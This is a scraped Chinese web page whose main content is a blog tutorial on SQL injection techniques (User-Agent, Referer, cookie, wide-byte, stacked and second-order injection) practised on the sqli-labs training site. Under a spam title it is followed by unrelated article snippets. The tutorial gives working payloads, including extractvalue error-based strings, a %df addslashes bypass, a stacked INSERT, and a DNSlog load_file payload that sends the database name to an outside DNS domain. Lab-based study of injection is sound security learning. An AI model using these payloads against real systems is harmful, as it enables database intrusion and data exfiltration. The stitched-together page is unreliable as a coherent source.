做阀门的网站在58同城做网站有生意吗

diannao/2026/1/20 15:19:00/文章来源:
做阀门的网站,在58同城做网站有生意吗,建筑工人招聘平台,服装加工厂怎么找客户除了联合查询注入#xff0c;报错注入#xff0c;盲注注入 sql注入还有以下几类#x1f9b9;#x1f9b9;#x1f9b9;#x1f9b9;#x1f9b9; 开始填坑 1.UA注入 原理#xff1a;有些网站会把用户的UA信息写入数据库#xff0c;用来收集和统计用户…除了联合查询注入报错注入盲注注入 sql注入还有以下几类 开始填坑               1.UA注入  原理有些网站会把用户的UA信息写入数据库用来收集和统计用户信息 此时就有可能存在UA 头注入一般会把数据插入到某张表中所以可以用报错注入。 就像sqli的第18关 在这里我们可以尝试ua头注入先找回登录的包  一个引号报错两个不报错 ---字符型注入 但是   这里的注入姿势又和select 不同因为这里已经不是select了 所以就要有新的poc 这里提供两个以及查看其最终的效果 1.在括号内进行构造 and extractvalue(1,concat(0x7e,(select database()),0x7e)) and 2.注释掉后面的值 ,1,extractvalue(1,concat(0x7e,(select database()),0x7e)));# 这就是ua注入 2.refer注入 原理当你访问一个网站的时候你的浏览器需要告诉服务器你是从哪个地方访问服务器 的大部分网站或者app都会写入数据库用来分析量从哪里来以及统计广告投入的成本一般会把数据插入到某张表中所以可以用报错注入 所以这个好像和ua注入差不多那就上poc吧 and extractvalue(1,(concat(0x7e,(select database()),0x7e))))# and extractvalue(1,(concat(0x7e,(select database()),0x7e))) and 这样都是可以的 3.Dnslog外带 原理将dnslog平台中的特有字段payload带入目标发起dns请求通过dns解析将请求后的关键信息组合成新的三级域名带出在dns服务器的dns日志中显示出来。 但是前提得是 需要root权限需要Windows的操作系统secure_file_priv为空 操作如下 先去找一个dns解析的网站 然后构造这样一个poc http://127.0.0.1/sqli/Less-1/?id1 and (select load_file(concat(\\\\,(select database()),.你的dns解析的域名/abc))) -- 这样就能将他的数据库名字返回了 如果你想爆user()的话记得在之前加上hex() 得到结果再进行解码 4.Cookie注入 虽然不知道为什么但是总有一些逆天cookie长这个样子 cookie注入的原理对get传递来的参数进行了过滤但是忽略了cookie也可以传递参数 所以我们就可以这样  and extractvalue(1,concat(0x7e,(select database()),0x7e))# 5.宽字节注入锟斤拷 一般什么时候会发生宽字节注入呢 当数据库采用GBK编码但是PHP又采用UTF-8编码的时候而且还采用了一些关键词过滤函数就会发生宽字节注入  没听懂        来给你举个例子 假如有一个url  127.0.0.1/sqli/less1/?id1 那我们不用想肯定是sql注入 单引号一套上去 但是你就会发现 ’ 变成了 /  这就是强大的addslashes()函数的功劳了 但是道高一丈魔高一尺 我们可以抓住规则的漏洞 数据库不是GBK编码吗我们能不能加点东西让/变成一个 汉字 这样我们就实现了’的逃逸 我们只要找一个ascii码值大一点的数将/和这个数让数据库一位是一个汉字就能实现绕过 我们常用%df就是这样 那剩下来拿数据那些就简单了很熟悉对吧 6.堆叠注入 堆叠顾名思义就是一堆的东西一起注入上案例sqli的38关 这关感觉平平无奇即使一个普通的字符串注入但是我们去看一下源码 暗藏玄只因鸡   开始代码审计 $sqlSELECT * FROM users WHERE id$id LIMIT 0,1; /* execute multi query */ if (mysqli_multi_query($con1, $sql)) {/* store first result set */if ($result mysqli_store_result($con1)){if($row mysqli_fetch_row($result)){echo font size 5 color #00FF00; printf(Your Username is : %s, $row[1]);echo br;printf(Your Password is : %s, $row[2]);echo br;echo /font;} // mysqli_free_result($result);}/* print divider */if (mysqli_more_results($con1)) 首先它的sql接受语句还是啥都没过滤可以直接注入了然后他居然有一个 mysqli_multi_query($con1, $sql)函数这个函数允许进行多次查询也就是造成堆叠注入的根源红队人员狂喜 于是就可以构造poc 1; insert into users(username,password) values(遇到堆叠注入,红队人员狂喜);-- 直接看第十六条数据嘿嘿 7.二次注入 如果要完成二次注入你就必须知道一个真实人员的账号假设有一个admin 密码也是admin 首先我们注册一个用户名字为admin# 密码为123  然后我们去改密码为123456就会发现  登不进去了 反而密码变成了我们改的密码123456 这是因为update的原因 我们用admin’# 改密码的时候发生了这样一个poc update users password 123456 where usernameadmin# 可以看到 admin后面的 刚好完成了闭合 并且用#将后面的注释掉了  这就是二次注入的魅力 基本不存在注入如果你把admin#也过滤那就没办法了但是我在二次尝试的时候就形成了注入 以上就基本上是sql注入的一些方法了 吐槽一句 好nm的冷啊啊啊啊啊啊啊啊啊啊啊啊啊

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/89927.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

校园网网站建设规划书合肥关键词排名技巧

目录 1 560. 和为 K 的子数组 2 239. 滑动窗口最大值 3 76. 最小覆盖子串 菜鸟做题第二周,语言是 C 1 560. 和为 K 的子数组 题眼:“子数组是数组中元素的连续非空序列。” 解决本问题的关键就在于如何翻译问题。子数组 s 的和可以看作数组 i 的…

自然人做音频网站违法吗网站的备案的要多少钱

在OpenStack环境中,虚拟机的迁移可以通过多种方式实现,包括实时迁移(Live Migration)和冷迁移(Cold Migration) 实时迁移(Live Migration) 实时迁移是在虚拟机运行的同时将其迁移到…

网上商城网站开发报告网站无备案

MaxCompute 按量计费资源为弹性伸缩资源,对于计算任务,按任务需求提供所需资源,对资源使用无限制,同时MaxCompute按量计费的账单为天账单,即当天消费需要第二天才出账,因此,有必要对计算任务的消…

容桂做pc端网站黑白网站设计

6月26日,2024年世界移动通信大会(MWC上海)如期举行,今年的展会以“未来先行”为主题,涵盖“超越 5G、数智制造和人工智能经济”三大技术主题。移远通信作为全球物联网行业的引领者之一,今年不仅在展示内容上…

3g小说网站内蒙古城乡建设厅网站资质公告

原标题:Android向更多蓝牙设备开放Fast Pair功能 配对更轻松了 来源:cnBeta.COM蓝牙是一项应用非常广泛的无线技术,在无线音频配件、智能手表和智能家电中都广泛使用。不过蓝牙设备的配对体验并不优秀,而且无法实现跨平台的一致性…

深圳市制作网站ui设计接单价目表

背景 LangChain学习中,尝试改了一下哈里森和吴恩达课程当中的问题,看看gpt-3.5-turbo在集成了ReAct和wikipedia后,如何回答《三体》的主要内容是什么这个问题,当然,主要是为了回答这问题时LangChain内部发生了什么。所…

wordpress 旅游预订手机优化电池充电要开吗

在日常的Mac使用过程中,有效的文件管理策略是保持设备高效运行的关键。随着时间的推移,无用的文件和忘记的数据可能会悄悄占据你的硬盘空间,导致设备变慢,甚至影响你的工作效率。因此,学习Mac文件管理,并定…

青岛网站制作服务商wordpress可以仿任何站

在JavaScript中,箭头函数是ES6中引入的一种新的函数语法。它们提供了一种更简洁的方式来写函数,并且对 this 关键字的行为有特殊的处理。 箭头函数(Arrow Functions) 箭头函数使用一个“箭头”(>)定义…

网站备案要多久时间苏州网上注册公司网址

0、测试环境 我们简化开发,创建一个简单的环境(因为没有其它包比如 service、dao,所以这里不用 Spring 容器,只用 SpringMVC 容器): Servelet 容器配置: package com.lyh.config;import org.s…

南宁网站排名外包郑州网站推广公司服务

https://wenku.baidu.com/view/fb553d795acfa1c7aa00cc27?pcf2#1 转载于:https://www.cnblogs.com/linewman/p/9918760.html

中文网站建设设计钱建网站

算术运算指令算术运算指令是反映CPU计算能力的一组指令,也是编程时经常使用的一组指令。它包括:加、减、乘、除及其相关的辅助指令。 该组指令的操作数可以是8位、16位和32位(80386)。当存储单元是该类指令的操作数时,该操作数的寻址方式可以…

wordpress修改链接东莞整站优化

7.1 视图容器组件 7.1.2 scroll-view组件 设置滚动条位置时默认是没有动画过渡的,scroll-with-animation设置为true即可开启动画过渡效果。 enable-back-to-top设置为true,用户单击标题栏可以让scroll-view中的内容快速地回到最顶部。iOS单击标题栏即…

p2p网站建设网站金融模版

1、获取 nginx 的镜像 # 默认是latest版本docker pull nginx 2、运行 nginx 容器 docker run --name nginx-80 -p 80:80 --rm -d nginx# --name nginx-80 设定容器的名称# -p 80:80 端口进行映射,将本地的80端口映射到容器内部的80端口# --rm 表示容器退出后直接…

网站制作ppt模板wordpress远程图片模块

fuxploide,一款针对文件上传的Fuzz检测工具 1.工具概述2.安装3.参数解析4.使用案例1.工具概述 Fuxploider 是一种开源渗透测试工具,可自动检测和利用文件上传表单缺陷。该工具能够检测允许上传的文件类型,并能够检测哪种技术最适合在所需的 Web 服务器上上传 Web Shell 或任…

大型门户网站 代码wordpress菜单文件

今天学习Django框架,用ajax向后台发送post请求,直接报了403错误,说CSRF验证失败;先前用模板的话都是在里面加一个 {% csrf_token %} 就直接搞定了CSRF的问题了;很显然,用ajax发送post请求这样就白搭了&…

浙江综合网站建设配件创建官方网站

1 synchronized可重入性的理解 当一个线程试图操作一个由其他线程持有的对象锁的临界资源时,将会处于阻塞状态,但当一个线程再次请求自己持有对象锁的临界资源时,如果当前锁是重入性,会请求将会成功,如果当前锁不是可…

优化网站制作方法大全宁德网站设计

本文参考:http://www.360doc.com/content/11/0308/14/5327079_99222581.shtml文献整理所得。 1.正整数的十进制转换为二进制. 十进制整数转换为二进制整数采用"除2取余,逆序排列"法。具体做法是:用2整除十进制整数,可以得到一个商…

开发企业网站费用手机安卓系统

前言在开发应用系统的时候,导出文件是必不可放的功能。以前用过POI、easyexcel等工具的导入导出功能,但总感觉太麻烦了,代码特别多,感觉并不是很好用。今天给大家介绍一款新工具,java工具类库Hutool。Hutool简介Hutool…

上海网站推荐大余网站建设

第一章 最优化的基本概念 1.最优化求解的数学模型建立 2.例题(考试第一大题:数学模型建立) 解析:优化变量、目标函数(一般取最小化)、约束条件 注意: 1)约束条件一般形式为&#…

迪庆北京网站建设wordpress分类数据库参数

需要在 Excel 中求一个数字的平方根吗?使用几个内置的 Excel 函数和公式可以轻松计算平方根。在本分步指南中,您将学习在 Excel 中计算平方根的 5 种不同方法,包括使用 SQRT 函数、POWER 函数、指数公式、VBA 代码和 Power Query。跟随教程&a…